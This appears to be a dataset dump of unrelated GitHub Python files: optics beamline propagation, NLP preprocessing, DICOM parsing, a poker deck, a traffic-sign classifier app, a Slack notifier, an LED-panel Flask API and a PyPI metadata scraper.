PropagationParameters(wavefront=w_in,propagation_elements = propagation_elements)\n\n propagation_parameters.set_additional_parameters('shift_half_pixel',(self._propagator_specific_parameteres[i])[\"shift_half_pixel\"])\n propagation_parameters.set_additional_parameters('magnification_x', (self._propagator_specific_parameteres[i])[\"magnification_x\"])\n propagation_parameters.set_additional_parameters('magnification_y', (self._propagator_specific_parameteres[i])[\"magnification_y\"])\n\n w_out = self._propagator.do_propagation(propagation_parameters=propagation_parameters,\n handler_name=self._propagator_handlers[i])\n\n output_wavefronts.append(w_out)\n\n\n\n return output_wavefronts\n\n\ndef create_wofry_wavefront(af,index,weight_with_eigenvalue=True):\n\n from wofry.propagator.wavefront2D.generic_wavefront import GenericWavefront2D\n\n z_array = 
af.mode(index)\n\n if weight_with_eigenvalue:\n z_array *= numpy.sqrt( (af.eigenvalue(index).real ))\n\n wavefront = GenericWavefront2D.initialize_wavefront_from_arrays(x_array=af.x_coordinates(),\n y_array=af.y_coordinates(),\n z_array=z_array,\n )\n\n wavefront.set_photon_energy(af.photon_energy())\n\n return wavefront\n\ndef create_wofry_elements(slit_width=5e-6,slit_height=5e-6):\n\n # first screen\n beamline_element1 = BeamlineElement(\n optical_element=WOScreen(),\n coordinates=ElementCoordinates(p=36.0,q=0))\n\n # lens\n beamline_element2 = BeamlineElement(\n optical_element=WOIdealLens(name='',focal_x=18.000000,focal_y=18.000000),\n coordinates=ElementCoordinates(p=0,q=0))\n\n # slit\n\n\n boundary_shape = Rectangle(x_left=-0.5*slit_width,x_right=0.5*slit_width,y_bottom=-0.5*slit_height,y_top=0.5*slit_height)\n beamline_element3 = BeamlineElement(\n optical_element=WOSlit(boundary_shape=boundary_shape),\n coordinates=ElementCoordinates(p=32,q=0))\n\n # screen\n beamline_element4 = BeamlineElement(\n optical_element=WOScreen(),\n coordinates=ElementCoordinates(p=2,q=0))\n\n {'shift_half_pixel':1,'magnification_x':1.0,'magnification_y':1.0}\n\n return [beamline_element1,beamline_element2,beamline_element3,beamline_element4],\\\n ['FRESNEL_ZOOM_XY_2D','FRESNEL_ZOOM_XY_2D','FRESNEL_ZOOM_XY_2D','FRESNEL_ZOOM_XY_2D'],\\\n [{'shift_half_pixel':1,'magnification_x':8.0,'magnification_y':8.0},\n {'shift_half_pixel':1,'magnification_x':1.0,'magnification_y':1.0},\n {'shift_half_pixel':1,'magnification_x':0.5,'magnification_y':0.35},\n {'shift_half_pixel':1,'magnification_x':0.2,'magnification_y':0.2}]\n\n\nif __name__ == \"__main__\":\n\n\n filename = \"/scisoft/users/glass/Documents/sources/Orange-SRW/comsyl/calculations/cs_new_u18_2m_1h_s2.5.npz\" # OK EBS\n # filename = \"/scisoft/users/glass/Documents/sources/Orange-SRW/comsyl/calculations/cl_low_beta_u18_2m_1h_s6.5.npy\" # OK LB\n # filename = \"/scisoft/users/glass/Documents/sources/Orange-SRW/comsyl/calculations/cl_high_beta_u18_2m_1h_s2.0.npy\"\n\n #\n # load CSD\n #\n\n af = CompactAFReader.initialize_from_file(filename)\n x = af.x_coordinates()\n y = af.y_coordinates()\n cumulated_occupation = af.cumulated_occupation_array()\n occupation = af.occupation_array()\n\n intensity_full = af.total_intensity()\n\n # plot(numpy.arange(cumulated_occupation.size),cumulated_occupation)\n\n\n # customize beamline\n slit_width=5e-6\n slit_height=5e-6\n\n slitV = [30,25,20,15,10,5, 5]\n slitH = [25,25,20,15,10,10,5]\n\n\n\n #\n # loop\n #\n f = open(\"propagation.txt\",'w')\n f.close()\n\n for j in range(1): #len(slitV)):\n\n slit_width = slitH[j]*1e-6\n slit_height = slitV[j]*1e-6\n\n intensity_accumulated = 0.0\n intensity_accumulated2 = 0.0\n\n for i in range(3): #af.number_modes()):\n wofry_wavefront = create_wofry_wavefront(af,i,weight_with_eigenvalue=True)\n e,h,s = create_wofry_elements(slit_width=slit_width,slit_height=slit_height)\n\n # plot_image(wofry_wavefront.get_intensity(),1e6*wofry_wavefront.get_coordinate_x(),1e6*wofry_wavefront.get_coordinate_y(),\n # title=\"source\")\n\n\n BEAMLINE = None\n BEAMLINE = WofrySuperBeamline()\n\n for k in range(len(e)):\n BEAMLINE.add_element(beamline_element=e[k],propagator_handler=h[k],propagator_specific_parameters=s[k])\n\n # BEAMLINE._info()\n\n wf_list = BEAMLINE.propagate(wofry_wavefront)\n\n\n\n intensity_accumulated += wf_list[-1].get_integrated_intensity()\n\n # for ll in range(4):\n # 
plot_image(wf_list[ll].get_intensity(),1e6*wf_list[ll].get_coordinate_x(),1e6*wf_list[ll].get_coordinate_y(),\n            #     title=\"slit H:%d x V:%d ; mode %d propagated to final oe\"%(slitH[j],slitV[j],i)+\">>ll% d\"%ll)\n\n            ratio = intensity_accumulated/intensity_full\n            print(\"slit H:%d, V:%d, up to mode: %d intensity(full): %g intensity(cut): %g ratio: %g \"%(\n                slitH[j],slitV[j],i,intensity_full,intensity_accumulated,ratio,))\n\n\n        print(\"\\n\\n\\n\\n\\n\\n\")\n        f = open(\"propagation.txt\",'a')\n        f.write('\"%d x %d\" %f \\n'%(slitV[j],slitH[j],ratio))\n        f.close()\n","repo_name":"srio/shadow3-scripts","sub_path":"HIGHLIGHTS/propagation2.py","file_name":"propagation2.py","file_ext":"py","file_size_in_byte":8141,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"23372972383","text":"# -------------------- for split-embedding feature -----------------------\nfrom util.preprocess import jsonl2Diclist, add_dic\nimport transformers\n\nclass SplitEmbedding:\n    def __init__(self, entity_property_pair_list, tokenizer : transformers.AutoTokenizer,\n                 model : transformers.AutoModel):\n        self.entity_property_list = entity_property_pair_list\n        self.tokenizer = tokenizer\n\n        # for entity_property_pair in entity_property_pair_list:\n        #     splited = entity_property_pair.split('#')\n        #     self.entity_list.append(splited[0])\n        #     self.property_list.append(splited[1])\n        #\n        # self.entity_list = list(set(self.entity_list))\n        # self.property_list = list(set(self.property_list))\n        #\n        # tokenized_entity_list = self.tokenizer(self.entity_list, return_tensors='pt', padding=True)\n        # hidden = model(tokenized_entity_list['input_ids'])\n        # self.entity_embedding_dict={}\n        # for n, entity in enumerate(self.entity_list):\n        #     self.entity_embedding_dict[entity] = hidden['last_hidden_state'][n, 0, :]\n\n        tokenized_entity_property_list = self.tokenizer(self.entity_property_list, return_tensors='pt', padding=True)\n        hidden = model(tokenized_entity_property_list['input_ids'])\n        self.entity_property_embedding_list={}\n        for n, entity_property_pair in enumerate(self.entity_property_list):\n            self.entity_property_embedding_list[entity_property_pair] = hidden['last_hidden_state'][n, 0, :]\n\n    def make_ent_attr_data(self, sentence, entity_property_pair_list):\n        # entity_embeddings_list = []\n        # property_embeddings_list = []\n        entity_property_embeddings_list=[]\n        tokenized_sentence_list = self.tokenizer([sentence for _ in range(len(entity_property_pair_list))])\n\n        for entity_property_pair in entity_property_pair_list:\n            # entity = entity_property_pair.split('#')[0]\n            # property = entity_property_pair.split('#')[1]\n            # entity_embeddings_list.append(self.entity_embedding_dict[entity])\n            # property_embeddings_list.append(self.property_embedding_dict[property])\n            entity_property_embeddings_list.append(self.entity_property_embedding_list[entity_property_pair])\n\n        res= {'input_ids': tokenized_sentence_list['input_ids'], 'attention_mask': tokenized_sentence_list['attention_mask'],\n              'entity_property_embeddings':entity_property_embeddings_list}\n        # 'entity_embeddings':entity_embeddings_list, 'property_embeddings':property_embeddings_list}\n        return res\n\n    def label_and_make_ent_attr_data(self, sentence, annotation_list, entity_property_pair_list):\n        tokenized_ent_attr_list = self.make_ent_attr_data(sentence, entity_property_pair_list)\n        tokenized_ent_attr_list['label'] = [0 for _ in range(len(entity_property_pair_list))]\n        for annotation in annotation_list:\n            
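# flag every annotated entity#property pair as a positive example for this sentence\n            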
tokenized_ent_attr_list['label'][entity_property_pair_list.index(annotation[0])] = 1\n\n        return tokenized_ent_attr_list\n\n    def label_emotion(self, sentence, annotation_list, emotion_pair):\n        # temp = {'input_ids': [], 'attention_mask': [], 'label': [], 'entity_embeddings': [], 'property_embeddings': []}\n        temp = {'input_ids': [], 'attention_mask': [], 'label': [], 'entity_property_embeddings': []}\n        for annot in annotation_list:\n            ent_attr = annot[0]\n            entity_property_embeddings = self.entity_property_embedding_list[ent_attr]\n            # entity = ent_attr.split('#')[0]\n            # property = ent_attr.split('#')[1]\n            # entity_embeddings = self.entity_embedding_dict[entity]\n            # property_embeddings = self.property_embedding_dict[property]\n\n            emotion = annot[2]\n            tokenized = self.tokenizer(sentence)\n            tokenized.data['label'] = emotion_pair[emotion]\n\n            temp['input_ids'].append(tokenized.data['input_ids'])\n            temp['attention_mask'].append(tokenized.data['attention_mask'])\n            temp['label'].append(tokenized.data['label'])\n            temp['entity_property_embeddings'].append(entity_property_embeddings)\n            # temp['entity_embeddings'].append(entity_embeddings)\n            # temp['property_embeddings'].append(property_embeddings)\n        return temp\n\n    def preprocess_ent_attr_splitembedding(self, train_filepath, dev_filepath, entity_property_pair_list):\n        train_dic = jsonl2Diclist(train_filepath)\n        dev_dic = jsonl2Diclist(dev_filepath)\n        # train_ent_attr_data = {'input_ids':[], 'attention_mask':[],'label':[], 'entity_embeddings':[], 'property_embeddings':[]}\n        # dev_ent_attr_data = {'input_ids':[], 'attention_mask':[],'label':[], 'entity_embeddings':[], 'property_embeddings':[]}\n        train_ent_attr_data = {'input_ids':[], 'attention_mask':[],'label':[], 'entity_property_embeddings': []}\n        dev_ent_attr_data = {'input_ids':[], 'attention_mask':[],'label':[], 'entity_property_embeddings': []}\n\n        print('labeling data...')\n        from tqdm import tqdm\n        for data in tqdm(train_dic):\n            temp_data = self.label_and_make_ent_attr_data(data['sentence_form'], data['annotation'], entity_property_pair_list)\n            train_ent_attr_data = add_dic(train_ent_attr_data, temp_data)\n        for data in tqdm(dev_dic):\n            temp_data = self.label_and_make_ent_attr_data(data['sentence_form'], data['annotation'], entity_property_pair_list)\n            dev_ent_attr_data = add_dic(dev_ent_attr_data, temp_data)\n\n        return train_ent_attr_data, dev_ent_attr_data\n\n    def preprocess_emotion_splitembedding(self, train_filepath, dev_filepath, emotion_pair):\n        dev_dic = jsonl2Diclist(dev_filepath)\n        train_dic = jsonl2Diclist(train_filepath)\n        # train_emotion_data = {'input_ids': [], 'attention_mask': [], 'label': [], 'entity_embeddings':[], 'property_embeddings':[]}\n        # dev_emotion_data = {'input_ids': [], 'attention_mask': [], 'label': [], 'entity_embeddings':[], 'property_embeddings':[]}\n        train_emotion_data = {'input_ids':[], 'attention_mask':[],'label':[], 'entity_property_embeddings': []}\n        dev_emotion_data = {'input_ids':[], 'attention_mask':[],'label':[], 'entity_property_embeddings': []}\n\n        for data in train_dic:\n            temp_data = self.label_emotion(data['sentence_form'], data['annotation'], emotion_pair)\n            train_emotion_data = add_dic(train_emotion_data, temp_data)\n        for data in dev_dic:\n            temp_data = self.label_emotion(data['sentence_form'], data['annotation'], emotion_pair)\n            dev_emotion_data = add_dic(dev_emotion_data, temp_data)\n\n        return train_emotion_data, 
dev_emotion_data","repo_name":"comchobo/team-ganadara-public","sub_path":"SplitEmbedding/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":6767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"24921433377","text":"from typing import cast, List\nimport sys\n\nfrom dicom_standard import parse_lib as pl\nfrom dicom_standard.macro_utils import MetadataTableType\nfrom dicom_standard.preprocess_modules_with_attributes import (\n key_tables_by_id,\n expand_all_macros,\n preprocess_attribute_fields,\n expand_hierarchy,\n)\n\n\nif __name__ == '__main__':\n module_macro_attr_tables = cast(List[MetadataTableType], pl.read_json_data(sys.argv[1]))\n id_to_table = key_tables_by_id(module_macro_attr_tables)\n macro_attr_tables = [table for table in module_macro_attr_tables if table['isMacro']]\n expanded_tables = expand_all_macros(macro_attr_tables, id_to_table)\n preprocessed_tables = preprocess_attribute_fields(expanded_tables)\n tables_with_hierarchy = expand_hierarchy(preprocessed_tables)\n pl.write_pretty_json(tables_with_hierarchy)\n","repo_name":"innolitics/dicom-standard","sub_path":"dicom_standard/preprocess_macros_with_attributes.py","file_name":"preprocess_macros_with_attributes.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":87,"dataset":"github-code","pt":"40"} +{"seq_id":"7833716793","text":"from constantes import PALOS, FIGURAS\nfrom carta import Carta\nimport random\nfrom mensajes import Mensajes\n\nmensajes = Mensajes()\n\nclass Baraja:\n\n def __init__(self):\n # Inicializamos una baraja sin cartas\n self.cartas = []\n self.crear_cartas_baraja()\n \n def crear_cartas_baraja(self):\n \"\"\"\n La baraja en el poker tiene 52 cartas. 
\n 13 cartas por cada palo\n \"\"\"\n for palo in PALOS:\n for cada_figura in FIGURAS:\n carta = Carta(palo=palo, figura=cada_figura) \n self.cartas.append(carta) \n \n def mostrar_cartas(self):\n for carta in self.cartas:\n carta.mostrar_carta()\n\n def barajar(self):\n random.shuffle(self.cartas)\n\n def ordenar_cartas(self):\n self.cartas.sort()\n \n def buscar_carta(self, carta):\n for cada_carta in self.cartas:\n if (carta.palo == cada_carta.palo and carta.figura == cada_carta.figura):\n return cada_carta\n else:\n mensajes.error(\"La carta buscada no esta en la baraja [{},{}]\".format(carta.palo, str(carta.figura)))\n return None\n\n def eliminar_carta_de_baraja(self, carta):\n carta_eliminada = None\n for indice, cada_carta in enumerate(self.cartas):\n if (cada_carta.palo == carta.palo and cada_carta.figura == carta.figura):\n carta_eliminada = self.cartas.pop(indice)\n return carta_eliminada\n\n def get_numero_de_cartas(self):\n return len(self.cartas)\n\n\n\nif __name__ ==\"__main__\":\n baraja = Baraja()\n baraja.barajar()\n baraja.mostrar_cartas()\n","repo_name":"spuzi/holdem","sub_path":"main/baraja.py","file_name":"baraja.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"15620747466","text":"import numpy as np \nfrom tensorflow import keras\nfrom PIL import Image\nfrom flask import Flask, json\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator, img_to_array, array_to_img, load_img\nfrom tensorflow.keras.utils import to_categorical\nfrom tensorflow.keras.models import Sequential, load_model\nfrom tensorflow.keras.applications import VGG19\nfrom tensorflow.keras.layers import Conv2D, MaxPool2D, Dense, Flatten, Dropout\n\nfrom gtts import gTTS\nimport gradio as gr\nfrom playsound import playsound\n\nbatch_size = 1\nseed = 42\n\nclasses = { 0:'Speed limit (20km/h)',\n 1:'Speed limit (30km/h)', \n 2:'Speed limit (50km/h)', \n 3:'Speed limit (60km/h)', \n 4:'Speed limit (70km/h)', \n 5:'Speed limit (80km/h)', \n 6:'End of speed limit (80km/h)', \n 7:'Speed limit (100km/h)', \n 8:'Speed limit (120km/h)', \n 9:'No passing', \n 10:'No passing veh over 3.5 tons', \n 11:'Right-of-way at intersection', \n 12:'Priority road', \n 13:'Yield', \n 14:'Stop', \n 15:'No vehicles', \n 16:'Veh > 3.5 tons prohibited', \n 17:'No entry', \n 18:'General caution', \n 19:'Dangerous curve left', \n 20:'Dangerous curve right', \n 21:'Double curve', \n 22:'Bumpy road', \n 23:'Slippery road', \n 24:'Road narrows on the right', \n 25:'Road work', \n 26:'Traffic signals', \n 27:'Pedestrians', \n 28:'Children crossing', \n 29:'Bicycles crossing', \n 30:'Beware of ice/snow',\n 31:'Wild animals crossing', \n 32:'End speed + passing limits', \n 33:'Turn right ahead', \n 34:'Turn left ahead', \n 35:'Ahead only', \n 36:'Go straight or right', \n 37:'Go straight or left', \n 38:'Keep right', \n 39:'Keep left', \n 40:'Roundabout mandatory', \n 41:'End of no passing', \n 42:'End no passing veh > 3.5 tons' }\nheight = 50\nwidth = 50\nbatch_size = 150\n\nmodel = keras.models.Sequential([ \n keras.layers.Conv2D(filters=16, kernel_size=(5,5), activation='relu', input_shape=(50,50,3)),\n keras.layers.Conv2D(filters=32, kernel_size=(5,5), activation='relu'),\n keras.layers.MaxPool2D(pool_size=(2, 2)),\n keras.layers.BatchNormalization(axis=-1),\n \n keras.layers.Conv2D(filters=64, kernel_size=(3,3), activation='relu'),\n keras.layers.Conv2D(filters=64, kernel_size=(3,3), activation='relu'),\n 
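# second block: pool, then batch-normalize and drop out before flattening\n    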
keras.layers.MaxPool2D(pool_size=(2, 2)),\n keras.layers.BatchNormalization(axis=-1),\n keras.layers.Dropout(rate=0.25),\n keras.layers.Flatten(),\n keras.layers.Dense(512, activation='relu'),\n keras.layers.BatchNormalization(),\n keras.layers.Dropout(rate=0.25),\n \n keras.layers.Dense(43, activation='softmax')\n])\n\nmodel = keras.models.load_model(filepath=r'models/CNN.h5')\n#model = keras.models.load_model(filepath='CNN.h5')\n\ndef pred(image):\n image_numpy = np.array(image.resize((50,50))) / 255\n image_numpy = np.expand_dims(image_numpy, axis=0)\n\n predicted = model.predict(image_numpy)\n namesign = classes[np.argmax(predicted, axis=-1)[0]]\n print(namesign)\n\n filename = 'speech.wav'\n tts = gTTS(namesign)\n tts.save(filename)\n #display(Audio(filename, autoplay=True))\n playsound(filename)\n return namesign\n\n\n\napi = Flask(__name__)\n\n@api.route('/', methods=['GET'])\ndef signToText():\n image = Image.open('test.jpg')\n res = pred(image)\n print(res)\n return\n\n# Path: main.py\nif __name__ == '__main__':\n print('Start')\n gr.Interface(fn=pred, \n inputs=gr.Image(type=\"pil\"),\n outputs=gr.Label(num_top_classes=3),\n examples=[]).launch(debug=True)\n #api.run()","repo_name":"ZeANi-SHILIX/BiGeN","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3894,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"43094597099","text":"from shepherd.notifier import Notifier\nfrom shepherd.event import Event\nfrom slacker import Slacker\n\nclass Slack(Notifier):\n def __init__(self, *args, **kwargs):\n super(Slack, self).__init__(*args, **kwargs)\n self.token = self.config.SLACK_TOKEN\n self.channel = self.config.SLACK_CHANNEL\n self.slack = Slacker(self.token)\n\n def notify(self, event:Event):\n try:\n attachments = self._create_attachments(event)\n response = self.slack.chat.post_message(self.channel, '',\n as_user=True, attachments=attachments)\n if response.body['ok']:\n self.log.debug(\"Notification sent to %s\" % self.channel)\n else:\n self.log.error(response.body)\n raise Exception(\"Failed to send notification to %s\" % self.channel)\n except Exception as e:\n import traceback\n self.log.error(traceback.format_exc())\n self.log.error(e)\n\n def _create_fields(self, event:Event):\n meta = event.meta()\n fields = []\n for key in meta.keys():\n val = meta[key]\n fields += [{\n \"title\": key.title(),\n \"value\": \"`%s`\" % val,\n \"short\": True\n }]\n\n return fields\n\n def _create_attachments(self, event:Event):\n return [{\n \"fallback\": event.description(),\n \"color\": event.severity(),\n \"author_name\": self.config.SLACK_AUTHOR_NAME,\n \"author_icon\": self.config.SLACK_AUTHOR_ICON,\n \"text\": event.summary(),\n \"footer\": self.config.SLACK_FOOTER,\n \"footer_icon\": self.config.SLACK_FOOTER_ICON,\n \"mrkdwn_in\": [\"text\", \"fields\"],\n \"fields\": self._create_fields(event)\n }]\n","repo_name":"coralhq/shepherd","sub_path":"src/shepherd/notifier/slack.py","file_name":"slack.py","file_ext":"py","file_size_in_byte":1862,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"1786706926","text":"from flask import Flask, jsonify, request\nfrom pixel_strip import createStrip\nfrom led import imageLoop, drawData, runDemo, updatePixel\nfrom render import motion\nfrom pixel_rain import start_rain, end_rain\n\n\napplication = Flask(__name__, static_folder='script')\napplication.config['SECRET_KEY'] = 'top-secret!'\n\nSTRIP = 
createStrip()\n\n# Response Dict\ndef request_ok(response_dict, success=True):\n    response_dict.update({\n        'success': success\n    })\n    resp = jsonify(**response_dict)\n    resp.status_code = 200\n    return resp\n\n@application.route('/image_cycle', methods=['GET', 'POST'])\ndef image_cycle():\n    imageLoop(STRIP)\n    return request_ok({ 'message': 'Started Displaying Images.'})\n\n\n\n@application.route('/set_pixel_box', methods=['POST'])\ndef set_pixel_box():\n    json = request.get_json()\n    img_data = None if 'img_data' not in json else json['img_data']\n    drawData(STRIP,img_data)\n    return request_ok({ 'message': 'Image Set'})\n\n@application.route('/pixel_update', methods=['POST'])\ndef pixel_update():\n    json = request.get_json()\n    img_data = None if 'img_data' not in json else json['img_data']\n    updatePixel(STRIP,img_data)\n    return request_ok({ 'message': 'Pixel Updated'})\n\n# Status Checkin\n\n\n# Rain\n@application.route('/rain_start', methods=['GET', 'POST'])\ndef rain_start():\n    start_rain(STRIP)\n    return request_ok({ 'message': 'Rain Complete'})\n\n@application.route('/rain_stop', methods=['GET', 'POST'])\ndef rain_stop():\n    end_rain()\n    return request_ok({ 'message': 'Rain Stopped.'})\n\n@application.route('/rain_toggle', methods=['GET', 'POST'])\ndef rain_toggle():\n    end_rain()\n    return request_ok({ 'message': 'Rain Stopped.'})\n\n\n\n\n@application.route('/ping', methods=['GET', 'POST'])\ndef ping():\n    return request_ok({ 'message': 'P0NG!'})\n\n@application.route('/test', methods=['GET', 'POST'])\ndef test():\n    motion(STRIP)\n    return request_ok({ 'message': 'Welcome to Amiblight\\'s mobile API.'})\n    \nif __name__ == '__main__':\n    application.run(debug=True,use_reloader=True, host='0.0.0.0', port=8080)\n","repo_name":"jmade/PixelBox-Server","sub_path":"pixelbox.py","file_name":"pixelbox.py","file_ext":"py","file_size_in_byte":2067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"14379124321","text":"from __future__ import annotations\nimport contextlib\nimport itertools\nimport json\nimport os\nimport re\nimport sqlite3\nimport subprocess\nimport tempfile\nimport threading\nimport time\nfrom concurrent.futures import ThreadPoolExecutor\nfrom contextlib import closing\n\nimport psl\nimport urllib3\nfrom packaging.version import InvalidVersion, Version\nfrom tqdm import tqdm\nfrom urllib3.util import parse_url\nfrom wheel_filename import InvalidFilenameError, parse_wheel_filename\n\n# logger = logging.getLogger()\n# logger.setLevel(logging.DEBUG)\n# logger.addHandler(logging.StreamHandler())\n\nMAX_WORKERS = 16\nGOOGLE_ASSURED_OSS_PACKAGES = set()\nDOWNLOADS_URL = \"https://raw.githubusercontent.com/hugovk/top-pypi-packages/main/top-pypi-packages-30-days.min.json\"\n\n@contextlib.contextmanager\ndef locked_db():\n    with db_lock:\n        yield _DB\n        _DB.commit()\n\n\ndef get_all_package_names():\n    resp = http.request(\"GET\", \"https://pypi.org/simple\")\n    return sorted(\n        [item.decode() for item in re.findall(b'href=\"/simple/([^/]+)/', resp.data)]\n    )\n\n\ndef get_extras(req):\n    return tuple(sorted(set(re.findall(r\"extra=='([^']+)'\", req))))\n\n\ndef dist_from_requires_dist(req):\n    return re.match(r\"^([A-Za-z0-9_.\\-]+)\", req).group(1)\n\n\ndef specifier_from_requires_dist(req):\n    return re.sub(r\"\\(([^)]+)\\)\", r\"\\1\", req, 1)\n\n\ndef normalize_requires_dist(req):\n    return re.sub(\n        r\"\\s*,\\s*\",\n        \",\",\n        re.sub(\n            r\"\\s*([!><=~]{1,2})\\s*\",\n            r\"\\1\",\n            re.sub(r\"\\s*;\\s*\", r\"; \", req.replace('\"', \"'\")),\n        ),\n    
).lower()\n\n\ndef requires_dist_sort_key(req):\n return (\n get_extras(req),\n re.match(r\"^([a-zA-Z0-9_.\\-\\[\\]]+)\", req).group(1).lower(),\n req,\n )\n\n\ndef to_versions(items):\n vers = []\n for item in items:\n try:\n vers.append(Version(item))\n except InvalidVersion:\n continue\n return vers\n\n\ndef sorted_versions(items):\n vers = []\n for item in items:\n try:\n vers.append((Version(item), item))\n except InvalidVersion:\n continue\n return [\n x\n for _, x in sorted(\n vers,\n )\n ]\n\n\ndef get_metadata_by_install(package, resp):\n if (\n os.system(\n f\"{venv_python} -m pip install --disable-pip-version-check {package} importlib-metadata > /dev/null\"\n )\n != 0\n ):\n return None\n\n print(f\"building {package!r} from source!\")\n popen = subprocess.Popen(\n f\"{venv_python} -c 'import json; from importlib_metadata import Distribution; \"\n f'd=Distribution.from_name(\"{package}\"); print(json.dumps({{\"requires_dist\": d.requires(package), \"requires_python\": d.metadata.get(\"Requires-Python\", \"\"), \"wheel_data\": dist.read_text(\"WHEEL\") or \"\"}}))\\'',\n shell=True,\n stdout=subprocess.PIPE,\n stderr=subprocess.DEVNULL,\n )\n\n # Run the install for no more than 20 seconds\n start_time = time.time()\n while time.time() - start_time < 20 and popen.poll() is None:\n time.sleep(0.5)\n\n if popen.returncode != 0:\n return resp\n package_metadata = json.loads(popen.stdout.read())\n\n resp = resp.copy()\n resp[\"info\"][\"requires_dist\"] = package_metadata[\"requires_dist\"]\n resp[\"info\"][\"requires_python\"] = package_metadata[\"requires_python\"]\n return resp\n\n\ndef get_maintainers_from_pypi(package: str):\n for _ in range(5):\n resp = http.request(\"GET\", f\"https://pypi.org/project/{package}/\")\n if resp.status == 404:\n return set()\n elif resp.status != 200:\n continue\n return set(\n re.findall(\n r\" check_score:\n continue\n\n checks[check_name] = check_score\n\n checks[\"Overall\"] = scorecard[\"score\"]\n break\n\n except (KeyError, IndexError):\n return {}\n return checks\n\n\ndef get_project_urls(info: dict) -> list[tuple[str, str, str]]:\n names_urls = [\n (\"docs_url\", info.get(\"docs_url\")),\n (\"Downloads\", info.get(\"download_url\")),\n (\"Homepage\", info.get(\"home_page\")),\n ]\n\n if info.get(\"project_urls\"):\n for name, url in info.get(\"project_urls\").items() or ():\n names_urls.append((name, url))\n\n names_urls_hosts = []\n for project_name, project_url in names_urls:\n parsed = parse_project_url(project_url)\n if not parsed:\n continue\n host = psl.domain_suffixes(parsed.host).private\n names_urls_hosts.append((project_name, str(parsed), host))\n\n return names_urls_hosts\n\n\ndef update_data_for_package(package: str) -> None:\n global downloads, db_lock, GOOGLE_ASSURED_OSS_PACKAGES\n\n resp = http.request(\"GET\", f\"https://pypi.org/pypi/{package}/json\")\n\n if resp.status != 200:\n return\n try:\n resp = json.loads(resp.data.decode(\"utf-8\"))\n except Exception:\n return\n try:\n version = Version(resp[\"info\"][\"version\"])\n except InvalidVersion: # The latest release has an invalid version, skip\n return\n latest_version = max(to_versions(resp[\"releases\"].keys()))\n\n # Favor pre-releases over non-pre-releases\n if version < latest_version:\n new_resp = http.request(\n \"GET\", f\"https://pypi.org/pypi/{package}/{latest_version}/json\"\n )\n if new_resp.status != 200:\n version = latest_version\n\n # Get the exact string for the version that we found\n for strv in resp.get(\"releases\", ()):\n try:\n if Version(strv) 
== version:\n str_version = strv\n break\n except InvalidVersion:\n continue\n else:\n # Skip this package\n return\n\n scorecard_checks = fetch_checks_for_package(package)\n scorecard_overall = scorecard_checks.pop(\"Overall\", None)\n\n maintainers = get_maintainers_from_pypi(package)\n\n requires_python = resp[\"info\"][\"requires_python\"] or \"\"\n urequires_dist = [\n normalize_requires_dist(x) for x in resp[\"info\"][\"requires_dist\"] or []\n ]\n urequires_dist = sorted(urequires_dist, key=requires_dist_sort_key)\n\n requires_dist = {\"specifiers\": [], \"dists\": []}\n requires_extras = {}\n yanked = []\n\n releases = resp[\"releases\"][str_version]\n first_uploaded_at = None if not releases else min(x[\"upload_time\"] for x in releases)\n last_uploaded_at = None if not releases else max(x[\"upload_time\"] for x in releases)\n wheel_data = [\n (x[\"filename\"], x[\"url\"], x[\"upload_time\"]) for x in releases if x[\"filename\"].endswith(\".whl\")\n ]\n has_binary_wheel = False\n\n for filename, _, uploaded_at in wheel_data:\n try:\n whl = parse_wheel_filename(filename)\n except InvalidFilenameError:\n continue\n python_tags, abi_tags, platform_tags = (\n whl.python_tags,\n whl.abi_tags,\n whl.platform_tags,\n )\n for wheel_data in itertools.product(python_tags, abi_tags, platform_tags):\n py, abi, plat = wheel_data\n with locked_db() as db:\n db.execute(\n \"\"\"\n INSERT INTO wheels (\n package_name, filename, build, python, abi, platform, uploaded_at\n ) VALUES (?, ?, ?, ?, ?, ?, ?);\n \"\"\",\n (package, filename, whl.build, py, abi, plat, uploaded_at),\n )\n\n if abi_tags == [\"none\"] and platform_tags == [\"any\"]:\n continue\n\n has_binary_wheel = True\n\n # Check if the package has any known vulnerabilities.\n has_vulnerabilities = bool(resp.get(\"vulnerabilities\", []))\n\n package_downloads = downloads.get(package, 0)\n with locked_db() as db:\n db.execute(\n \"\"\"\n INSERT OR IGNORE INTO packages (\n name, version, requires_python, has_binary_wheel, has_vulnerabilities, first_uploaded_at, last_uploaded_at, downloads, scorecard_overall, in_google_assured_oss\n ) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?);\n \"\"\",\n (\n package,\n str_version,\n requires_python,\n has_binary_wheel,\n has_vulnerabilities,\n first_uploaded_at,\n last_uploaded_at,\n package_downloads,\n scorecard_overall,\n package.lower() in GOOGLE_ASSURED_OSS_PACKAGES\n ),\n )\n\n project_urls = get_project_urls(resp[\"info\"])\n\n for name, url, host in project_urls:\n db.execute(\n \"\"\"\n INSERT OR IGNORE INTO package_urls (package_name, name, url, public_suffix) VALUES (?, ?, ?, ?);\n \"\"\",\n (package, name, url, host),\n )\n\n for maintainer in maintainers:\n db.execute(\n \"\"\"\n INSERT OR IGNORE INTO maintainers (name, package_name) VALUES (?, ?);\n \"\"\",\n (maintainer, package),\n )\n\n for req in urequires_dist:\n extras = get_extras(req)\n req_no_specifiers = dist_from_requires_dist(req)\n specifier = specifier_from_requires_dist(req).replace(\n req_no_specifiers + \" \", \"\", 1\n )\n if extras:\n for extra in extras:\n db.execute(\n \"\"\"\n INSERT OR IGNORE INTO deps (\n package_name,\n dep_name,\n dep_specifier,\n extra\n ) VALUES (?, ?, ?, ?);\n \"\"\",\n (package, req_no_specifiers, specifier, extra),\n )\n else:\n db.execute(\n \"\"\"\n INSERT OR IGNORE 